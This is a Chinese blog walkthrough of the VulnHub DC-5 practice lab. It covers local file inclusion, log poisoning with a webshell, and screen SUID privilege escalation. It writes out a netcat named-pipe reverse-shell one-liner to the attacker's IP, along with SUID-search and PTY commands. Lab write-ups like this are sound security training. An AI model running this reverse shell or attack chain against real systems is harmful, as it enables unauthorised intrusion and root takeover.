Vulnhub靶机之DC-5

最新推荐文章于 2025-03-05 16:28:58 发布
最新推荐文章于 2025-03-05 16:28:58 发布
阅读量539 收藏 2
点赞数 1
文章标签: web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_52328368/article/details/126533964
版权

        今天继续我们的vulnhub靶机系列,我们今天的靶场是DC-5,后面是下载地址https://download.vulnhub.com/dc/DC-5.zip,官网下载的还是挺快的,有需要网盘的朋友可以评论区留言。下面我们就开始打靶。

0x00导入靶场

 这一步比较简单,就不赘述,把靶场导进去就行了,要注意的是我们把网络适配器改为NAT模式,这里比较简单,也不赘述。

0x01信息收集

我们看看靶机的ip地址

因为我的kali机的ip地址是192.168.133.130,所以靶机的ip地址是192.168.133.132

我们看看靶机开放的端口

看到开放了80端口,我们访问一下看看

这都是些啥东西,看也看不懂,但发现contact界面可以提交东西,试了下xss,结果失败

偶然的发现刷新界面,下面的年份会发生改变

我猜就算没有后面的参数,刷新应该也会改变年份,我们试试看

果然发生该变 了

接着我们用dirsearch扫面看看

我们试试footer.php这个页面看看

刷新一下发现页面这个还是在变

thankyou.php页面包含了footer.php这个页面的东西,而且都会发生改变,于是联想到文件包含漏洞

试下/etc/passwd看看能不能成功

发现成功了

我们爆破看看能发现哪些文件

爆破出了日志文件

访问看看

0x02webshell注入

然后我们就尝试往日志文件写入一句话木马

然后我们用蚁剑连接·

我们打开终端 (点击第一个terminal )

先开一个监听端口

然后在蚁剑那个终端输入命令(注意ip是kali的ip,不是靶机的)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.133.130 4444 >/tmp/f

回去发现监听成功

我们输入命令变为交互方式

python -c 'import pty;pty.spawn("/bin/bash")';

0x03漏洞利用

看看能利用提权的文件或命令

find / -perm /4000 2>/dev/null

测试发现screen可以被拿来提权

我们用searchsploit看看能利用的方法

第一个就是我们能够利用的

我们看看文件的位置

看看里面的内容

我们根据里面的提示来,先创建一个libhax,c文件,把第一部分的C语言代码放进去,然后进行编译

然后保存接着编译

然后删除libhax.c文件

接着我们处理第二段C语言代码,一样的方式

然后新建一个dc5.sh文件,把刚才文件的C语言代码的部分删除重新保存

然后把刚才编译的文件上传到蚁剑里面的tmp目录下,点击upload file

然后把刚刚编译好的问价上传上去

 我们再重新开启一个新的监听

 在蚁剑的刚刚上传文件那里打开终端,输入命令

最下面那个Open Terminal Here

 

发现监听成功,然后输入命令变为交互模式

0x05提取权限

授予执行权限

然后提权

看看我们此时的权限已经是root权限了

下面就好整了,切换到root问价下,就看到了flag文件

cat一下问价就看到了flag文件的内容

成功拿下这个靶机。

nxbug
关注
VulnHubDC-5
weixin_39219503的博客
02-01 754
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-5,314/ 题目信息如下,只有一个flag Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3212
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
vulnhubdc5
qq_54030686的博客
06-13 379
这个靶场延续了dc系列一贯直白的套路,直接提升权限,实际操作中还是存在着一些未能解决的问题,话不多说,直接干 官方wp地址 主机发现 这里介绍一下 ip地址之后的24,代表24个字节,A段,B段,C段各占8个字节,也就是每一个段共有256个数字,检测B段的话,0/16,检测A段的0/8 目标为139,本机IP为128,进行端口检测 不知道为什么,我这边多个了45530端口,有可能是因为我做完的缘故,但是不影响,共有三个端口80为http服务,111为rpcbind服务,45530不晓得是哪个服务 谷歌大法中
DC-5靶场
最新发布
2301_76794492的博客
03-05 968
靶机下载地址:[https://www.vulnhub.com/entry/dc-5,314/]
Vulnhub DC-5
Pai_Space
02-20 341
Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with.
vulnhub靶场之DC-5
qq_58091216的博客
01-10 1305
发现存在index.php,solutions.php,about-us.php,faq.php,contact.php,thankyou.php,footer.php七个页面。打开这几个页面,发现发开footer.php时,不断刷新,图标也在不断地变化,确认文件包含页面是footer.php。使用BurpSuite抓包,爆破后台页面,由于是php站,我们选择php字典。选择草叉模式进行爆破,选择两个爆破点,一个是文件包含变量名,一个是包含值。琢磨琢磨,最后发现,只要一刷新页面,就会变,猜想存在文件包含。
vulnhub--DC5
weixin_55129870的博客
05-19 402
kali ip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC-5 IP:192.168.44.145 端口探测 nmap -A -p1-65535 -T4 192.168.44.145 发现有一个80端口和111端口并且运行着rpcinfo服务,44040 访问http服务 发现留言板 提交XSS没有反应,但是提交时,底部时间会刷新变化 dirsearch 扫描 dirsearch是一个基于pyth...
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1436
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2649
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
VulnHub靶机 DC-7 打靶 渗透详细流程
网络空间安全学习
04-22 1304
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
VulnHub靶场~DC-5
里丘~班诺的小屋
05-15 842
0X00 靶机的环境搭配 攻击机(Kali):192.168.238.130 靶机(DC-5):192.168.138 靶机地址:DC: 5 ~ VulnHub 0X01 信息收集 一、IP扫描 ┌──(root㉿kali)-[~] └─#arp-scan -l 二、端口扫描 ┌──(root㉿kali)-[~] └─# nmap -T4 -sV -O -A 192.168.238.138 三、网站目录扫描 ┌──(root㉿kali)...
Vulnhub靶机DC系列-DC-5
m0_54525483的博客
01-04 800
Vulnhub靶机DC系列-DC-5 靶场名称:DC-5 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ 下载地址: DC-5.zip (Size: 521 MB) Download: http://www.five86.com/downloads/DC-5.zip Download (Mirror): https://download.vulnhub.com/dc/DC-5.zip Download (Torrent): https://download.vuln
vulnhub靶场,DC-5
kukudeshuo的博客
07-13 661
vulnhub靶场,DC-5 环境准备 攻击机:kali(192.168.58.130) 靶机DC-5(192.168.58.148) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.148 使用nmap扫描查看目标靶机端口开放情况 开放端口:80、111、55980 web容器:nginx 浏览器访问目标靶机80端口 就只是一些文字,没
vulnhub dc5
qq_44925740的博客
12-09 1290
vulnhub DC5前言一、信息收集二、漏洞利用三、 提权 前言 前几个DC感觉没什么新奇(DC2有个绕过rbash,git提权),就放了个5。 一、信息收集 nmap -sn 192.168.1.0/24 nmap -Pn 192.168.1.178 然后我脑瘫的疯狂怼111端口。。。转换思路到80端口 访问web页面 扫后台 footer.php 刷新一次跟上次不一样?? 在http://192.168.1.178/contact.php提交表单包含了footer.php而且刷新的时候footer
vulnhubDC5
底层社会中的弱智
01-20 583
在前面的总结,遇见多参数的传值,可以尝试wfuzz来查看是否存在隐藏参数或者检测LFI漏洞 找到目标机器的IP为192.168.1.110 使用nmap来扫描一下开放的端口以及服务 80端口http服务(敏感目录爆破,十大常规漏洞的检测,中间件解析漏洞) 111端口rpc服务 NFS网络文件共享(showmount -a ip来查看具体的文件) 我先使用showmount命令来查看一下...
DC-5靶机
mlws1900的博客
03-25 1054
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
Vulnhub靶机渗透测试——DC-5
Cobra的博客
05-11 1082
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.184 靶机下载地址: 二、信息收集 1、使用nmap进行存活主机探测 nmap 192.168.189.0/24 2、发现IP192.168.189.184开放80,111端口,再次使用nmap对其进行扫描 nmap 192.168.189.184 -sV -T4 -A -p- 3、访问其80端口 4、浏览页面并没有发现可以进行漏洞利用的地方,使用
Vulnhub系列之DC5靶场详解
weixin_50053818的博客
05-13 1866
文章目录环境文件包含突破点screen提权 环境 vulhub系列之DC5靶场 VMware虚拟机 kali 文件包含突破点 根据目标靶机MAC地址得到靶机IP为192.168.43.160,直接上nmap扫描。 发现开放了80、111、36936端口,暂时只知道端口80是web站点,另外两个端口未知。其他无头绪,直接访问网页。 进入网页,一堆的英文,看了一下内容发现没有什么用,只有Contact页面有几个输入点,经过SQL注入和XSS测试,没有发现相关漏洞。 卡了半天没有找到什么突破点了,所以尝试
vulnhub靶机DC-1
02-08
### VulnHub DC-1 靶机 攻略 介绍 #### 下载地址 VulnHub是一个提供各种虚拟机镜像用于安全测试和学习渗透测试技巧的平台。对于DC-1靶机,可以在[VulnHub官网](https://www.vulnhub.com/)搜索并下载该靶机镜像文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值